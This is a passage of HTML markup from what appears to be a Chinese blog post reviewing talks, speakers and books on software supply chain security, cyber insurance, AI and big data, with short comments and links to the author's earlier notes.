auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">“心境强时，容易创新。心境弱时，容易学习吸收”。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">笔记：<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483862&amp;idx=1&amp;sn=abc86fc485face4386c277b90a2f60a2&amp;chksm=cf3d73f3f84afae5a13d0c04248c631a7180e3e082fa669c0c388419a2cdfca3a84288e766bb&amp;scene=21#wechat_redirect" textvalue="碰撞、交融与创新的盛宴 - 华泰证券第二届工业软件论坛笔记" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">碰撞、交融与创新的盛宴 - 华泰证券第二届工业软件论坛笔记</a></span></p></td></tr><tr><td width="110" valign="top" style="width:85.25pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">Chris Howard</span></p></td><td width="442" valign="top" style="width:341.3pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《Gartner Top Trends》</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">&#34;一项技术，进入虚无期后，才真正开始&#34;;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">&#34;未来是造出来的,往往只需要找到催化剂，将这些东西融合在一起&#34;。</span></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><br/></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">四、供应链：压箱底的技术怎么发挥价值？</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="49" valign="top" style="width:48.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">供应链</span></p></td><td width="503" valign="top" style="width:496.65pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">系列讲座、论文。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">笔记：<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484014&amp;idx=1&amp;sn=138ebb90548ecf62013dd32d25b8fe7a&amp;chksm=cf3d704bf84af95d41568b3b5d51a8ba1b7de380e0482068a590e584dec4250fd9efb225fc12&amp;scene=21#wechat_redirect" textvalue="软件供应链安全: 学术洞见与产业方案的双向奔赴" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">软件供应链安全: 学术洞见与产业方案的双向奔赴</a></span></p></td></tr><tr><td width="49" valign="top" style="width:48.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">王树勋</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">唐涵喆</span></p></td><td width="503" valign="top" style="width: 496.65pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《保险视角下的网安保险》。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">笔记：<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483963&amp;idx=1&amp;sn=0a90b8cb98498d12d22835c0d28424cf&amp;chksm=cf3d701ef84af908ba2f4117a26c7e45ac6e4530964c4141dd149d0bfd0c4609eff3a0cb90bb&amp;scene=21#wechat_redirect" textvalue="如何量化网络安全风险？学一学精算师是怎么做的！" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">如何量化网络安全风险？学一学精算师是怎么做的！</a></span></p></td></tr><tr><td width="49" valign="top" style="width:48.0pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">科普</span></p></td><td width="503" valign="top" style="width:497.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《基因科学系列讲座》。和软件供应链相关，想做软件基因组计划，找到这个很好的科普材料</span>        <o:page></o:page></p></td></tr><tr><td width="49" valign="top" style="width:48.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">廖湘科</span></p></td><td width="503" valign="top" style="width:496.65pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">软件定义一切。软件根技术将成为国家战略科技竞争制高点。软件产业就像一棵参天大树，上层应用的枝繁叶茂，更需要大地之下基础软件的强劲发达.</span></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"> </span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">五、智能：</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">AI</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">会踹破专业门槛吗？</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="106" valign="top" style="width: 105.85pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">兄弟单位</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">牵头：涛哥</span></p></td><td width="446" valign="top" style="width:439.8pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">网路安全和人工智能。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">笔记：<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483893&amp;idx=1&amp;sn=4e428bb0f9a2e45aa384295f45409c7d&amp;chksm=cf3d73d0f84afac6b22d8c8bed124b7f49c0bc5f35fecf9e4cea0fc3bf4956a32dd3db4e5c53&amp;scene=21#wechat_redirect" textvalue="大模型会踹破我们的专业门槛吗？" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">大模型会踹破我们的专业门槛吗？</a></span></p></td></tr><tr><td width="106" valign="top" style="width:105.85pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">周傲英</span></p></td><td width="446" valign="top" style="width:439.8pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">AI工具将助力我们回归科学本源。科学研究的第四范式，数据范式，带进了人的主观意识，突破了自然科学的边界。</span></p></td></tr><tr><td width="106" valign="top" style="width:105.85pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">aws</span></p></td><td width="446" valign="top" style="width: 444.75pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">AWS Re</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">:</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">invent， Opensearch Con。国外软件或开源大厂是新工艺、新机器的创新，解决共性问题。不是施工队。</span></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"> </span></p><p style="margin-left: 0pt;letter-spacing: 0.578px;text-indent: 0pt;text-wrap: wrap;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 16pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(20, 50, 77);font-weight: bold;">六、大数据：大数据领域最核心的是什么？</span></p><table cellspacing="0" cellpadding="0" width="578"><tbody><tr><td width="113" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">数澜大学，任寅姿 季乐乐</span></p><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"> </span></p></td><td width="431" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">《标签类目体系》可以是大数据的入门书籍。</span></p><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">有思维金字塔，敢批判性分析阿里的人-货-场，虽然我也不同意他的人-物-关系模型。</span></p></td></tr><tr><td width="113" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">Grant Ingersoll</span></p></td><td width="431" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">《A single pane of glass for your data》，搜索只是一种解决方案，要解决什么问题呢？</span></p><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">社区就是生态，核心都需要一个软件工具。</span></p></td></tr><tr><td width="113" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">周傲英</span></p></td><td width="431" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">AI工具将助力我们回归科学本源。科学研究的第四范式，数据范式，带进了人的主观意识，突破了自然科学的边界。</span></p></td></tr><tr><td width="113" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">Hans Georg Ackermann</span></p></td><td width="431" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">《刑事侦查手册》，一本关于犯罪侦查和法医学的经典参考书籍，挺好的大数据实践框架参考，也展示了新建学科的途径</span></p></td></tr></tbody></table><p style="margin-left: 0pt;letter-spacing: 0.578px;text-indent: 0pt;text-wrap: wrap;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"> </span><span style="font-family: 微软雅黑;font-size: 